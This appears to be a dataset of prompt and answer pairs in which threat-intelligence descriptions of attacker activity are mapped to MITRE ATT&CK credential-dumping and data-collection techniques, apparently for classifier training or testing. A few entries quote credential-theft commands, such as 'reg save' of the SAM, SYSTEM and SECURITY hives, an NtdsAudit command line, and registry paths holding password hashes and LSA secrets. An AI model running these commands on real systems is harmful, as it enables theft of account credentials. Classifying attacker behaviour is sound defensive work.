+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can create a memory dump of LSASS via the `MiniDumpWriteDump Win32` API call.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windows Credential Editor can dump credentials.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 copied the `SAM` and `SYSTEM` Registry hives for credential harvesting.","Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors dumped account hashes using gsecdump.","Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors leveraged a custom tool to dump OS credentials and used following commands: `reg save HKLM\\SYSTEM system.hiv`, `reg save HKLM\\SAM sam.hiv`, and `reg save HKLM\\SECURITY security.hiv`, to dump SAM, SYSTEM and SECURITY hives.","Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used the `reg save` command to save registry hives.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 extracted user account data from the Security Account Managerr (SAM), making a copy of this database from the registry using the reg save command or by exploiting volume shadow copies.","Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has copied and exfiltrated the SAM Registry hive from targeted systems.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has dropped and executed SecretsDump to dump password hashes.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has extracted the SAM and SYSTEM registry hives using the `reg.exe` binary for obtaining password hashes from a compromised machine.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used reg commands to dump specific hives from the Windows Registry, such as the SAM hive, and obtain password hashes.","Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has dumped credentials, including by using gsecdump.","Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has acquired credentials from the SAM/SECURITY registry hives.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used a modified version of pentesting tools wmiexec.vbs and secretsdump.py to dump credentials.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can recover hashed passwords.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke collects Windows account hashes.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Password stealer and NTLM stealer modules in CozyCar harvest stored credentials from the victim, including credentials used as part of Windows NTLM user authentication.","Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can dump usernames and hashed passwords from the SAM.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fgdump can dump Windows password hashes.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has the capability to harvest credentials and passwords from the SAM database.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IceApple's Credential Dumper module can dump encrypted password hashes from SAM registry keys, including `HKLM\SAM\SAM\Domains\Account\F` and `HKLM\SAM\SAM\Domains\Account\Users\*\V`.","Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can gather hashed passwords by dumping SAM/SECURITY hive.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the SAM table.","Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mivast has the capability to gather NTLM password information.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERTON has the ability to dump password hashes.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec can dump the SAM database.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gsecdump can dump Windows password hashes from the SAM.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: pwdump can be used to dump credentials from the SAM.,"Tecnique: T1003.002 OS Credential Dumping: Security Account Manager, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors accessed and mounted virtual hard disk backups to extract
+ntds.dit.","Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used the ntdsutil.exe utility to export the Active Directory database for credential access.,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used ntdsutil to obtain a copy of the victim environment ntds.dit file.,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has gathered the SYSTEM registry and ntds.dit files from target systems. Chimera specifically has used the NtdsAudit tool to dump the password hashes of domain users via msadcs.exe ""NTDS.dit"" -s ""SYSTEM"" -p RecordedTV_pdmp.txt --users-csv RecordedTV_users.csv and used ntdsutil to copy the Active Directory database.","Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has dropped and executed SecretsDump to dump password hashes. They also obtained ntds.dit from domain controllers.,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has harvested the NTDS.DIT file and leveraged the Impacket tool on the compromised domain controller to locally decrypt it.,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used Volume Shadow Copy to access credential information from NTDS.,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has stolen copies of the Active Directory database (NTDS.DIT).,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has used NTDSDump and other password dumping tools to gather credentials.,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has used Windows built-in tool `ntdsutil` to extract the Active Directory (AD) database.,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. Mustang Panda has also used reg save on the SYSTEM file Registry location to help extract the NTDS.dit file.,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used `ntdsutil.exe` to back up the Active Directory database, likely for credential access.","Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider has extracted the `NTDS.dit` file by creating volume shadow copies of virtual domain controller disks.,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has used ntds.util to create domain controller installation media containing usernames and password hashes.,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has gained access to credentials via exported copies of the ntds.dit Active Directory database. Wizard Spider has also created a volume shadow copy and used a batch script file to collect NTDS.dit with the use of the Windows utility, ntdsutil.","Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used Ntdsutil to dump credentials.,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can dump hashed passwords associated with Active Directory using Windows' Directory Replication Services API (DRSUAPI), or Volume Shadow Copy.","Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information from NTDS.dit.,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can gather hashed passwords by gathering domain controller hashes from NTDS.,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: esentutl can copy `ntds.dit` using the Volume Shadow Copy service.,"Tecnique: T1003.003 OS Credential Dumping: NTDS, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used the `reg save` command to extract LSA secrets offline.,"Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used a variety of publicly available tools like LaZagne to gather credentials.,"Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has dropped and executed SecretsDump to dump password hashes.,"Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has dumped credentials, including by using gsecdump.","Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer used several tools for retrieving login and password information, including LaZagne.","Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has performed credential dumping with LaZagne.,"Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access.,"Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.,"Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used a modified version of pentesting tools wmiexec.vbs and secretsdump.py to dump credentials.,"Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can dump secrets from the Local Security Authority.,"Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke collects LSA secrets.,"Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can dump hashed passwords from LSA secrets for the targeted system.,"Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IceApple's Credential Dumper module can dump LSA secrets from registry keys, including: `HKLM\SECURITY\Policy\PolEKList\default`, `HKLM\SECURITY\Policy\Secrets\*\CurrVal`, and `HKLM\SECURITY\Policy\Secrets\*\OldVal`.","Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information.,"Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LaZagne can perform credential dumping from LSA secrets to obtain account and password information.,"Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSA.","Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can use Lazagne for harvesting credentials.,"Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gsecdump can dump LSA secrets.,"Tecnique: T1003.004 OS Credential Dumping: LSA Secrets, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used a variety of publicly available tools like LaZagne to gather credentials.,"Tecnique: T1003.005 OS Credential Dumping: Cached Domain Credentials, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer used several tools for retrieving login and password information, including LaZagne.","Tecnique: T1003.005 OS Credential Dumping: Cached Domain Credentials, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has performed credential dumping with LaZagne.,"Tecnique: T1003.005 OS Credential Dumping: Cached Domain Credentials, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access.,"Tecnique: T1003.005 OS Credential Dumping: Cached Domain Credentials, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cachedump can extract cached password hashes from cache entry information.,"Tecnique: T1003.005 OS Credential Dumping: Cached Domain Credentials, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LaZagne can perform credential dumping from MSCache to obtain account and password information.,"Tecnique: T1003.005 OS Credential Dumping: Cached Domain Credentials, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum was seen using modified Quarks PwDump to perform credential dumping.,"Tecnique: T1003.005 OS Credential Dumping: Cached Domain Credentials, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can use Lazagne for harvesting credentials.,"Tecnique: T1003.005 OS Credential Dumping: Cached Domain Credentials, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider performed domain replication.","Tecnique: T1003.006 OS Credential Dumping: DCSync, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used Mimikatz's DCSync to dump credentials from the memory of the targeted system.","Tecnique: T1003.006 OS Credential Dumping: DCSync, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used privileged accounts to replicate directory service data with domain controllers.","Tecnique: T1003.006 OS Credential Dumping: DCSync, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has used a DCSync command with Mimikatz to retrieve credentials from an exploited controller.,"Tecnique: T1003.006 OS Credential Dumping: DCSync, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has used DCSync attacks to gather credentials for privilege escalation routines.,"Tecnique: T1003.006 OS Credential Dumping: DCSync, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DCSync/NetSync.","Tecnique: T1003.006 OS Credential Dumping: DCSync, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LaZagne can use the `/maps` and `/mem` files to identify regex patterns to dump cleartext passwords from the browser's process memory.,"Tecnique: T1003.007 OS Credential Dumping: Proc Filesystem, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MimiPenguin can use the `/maps` and `/mem` file to search for regex patterns and dump the process memory.,"Tecnique: T1003.007 OS Credential Dumping: Proc Filesystem, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PACEMAKER has the ability to extract credentials from OS memory.,"Tecnique: T1003.007 OS Credential Dumping: Proc Filesystem, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LaZagne can obtain credential information from /etc/shadow using the shadow.py module.,"Tecnique: T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors obtained files and data from the compromised network.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0026, the threat actors collected documents from compromised hosts.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During CostaRicto, the threat actors collected data and files from compromised networks.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors stole the running configuration and cache data from targeted Ivanti Connect Secure VPNs.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors used Empire to gather various local system information.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, the threat actors collected files and other data from compromised systems.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors collected data, files, and other information from compromised networks.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group used malicious Trojans and DLL files to exfiltrate data from an infected host.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors collected data from compromised hosts.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors exfiltrated files and directories of interest from the targeted system.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 extracted files from compromised networks.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 has collected files from a local victim.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has retrieved internal documents from machines inside victim environments, including by using Forfiles to stage documents before exfiltration.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has stolen data from compromised hosts.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 will identify Microsoft Office documents on the victim's computer.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has collected data from victims' local systems.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has collected data from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used various tools to steal files from the compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 has uploaded files and data from a compromised host.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Andariel has collected large numbers of files from compromised network systems for later extraction.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom has collected data from a compromised network.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has exfiltrated files stolen from local systems.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CURIUM has exfiltrated data from a compromised machine.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dark Caracal collected complete contents of the 'Pictures' folder from compromised Windows systems.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has collected data from local victim systems.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has gathered stolen credentials, sensitive data such as point-of-sale (POS), and ATM data from a compromised network before exfiltration.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has collected and exfiltrated payment card data from compromised systems.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has collected files and other sensitive information from a compromised network.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has searched local system resources to access sensitive documents.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM collected data from the victim's local system, including password hashes from the SAM hive in the Registry.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has collected files from infected systems and uploaded them to a C2 server.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has collected data and files from a compromised machine.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception used a file hunting plugin to collect .txt, .pdf, .xls or .doc files from the infected host.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang gathered information and files from local directories for exfiltration.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has collected Office, PDF, and HWP documents from its victims.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ uploaded sensitive files, information, and credentials from a targeted organization for extortion or public release.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has collected data and files from compromised networks.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has collected files and data from compromised machines.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used a web shell to exfiltrate a ZIP file containing a dump of LSASS memory on a compromised machine.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork collected and exfiltrated files from the infected system.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has exfiltrated internal documents, files, and other data from compromised hosts.","Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stealth Falcon malware gathers data from the local victim system.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has run scripts to collect documents from targeted hosts.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla RPC backdoors can upload files from victim machines.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has stolen the Active Directory database from targeted environments and used Wevtutil to extract event log information.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windigo has used a script to gather credentials in files left on disk by OpenSSH backdoors.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has collected data from a compromised host prior to exfiltration.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has collected various files from the compromised computers.,"Tecnique: T1005 Data from Local System, Tactic: TA0009 Collection"
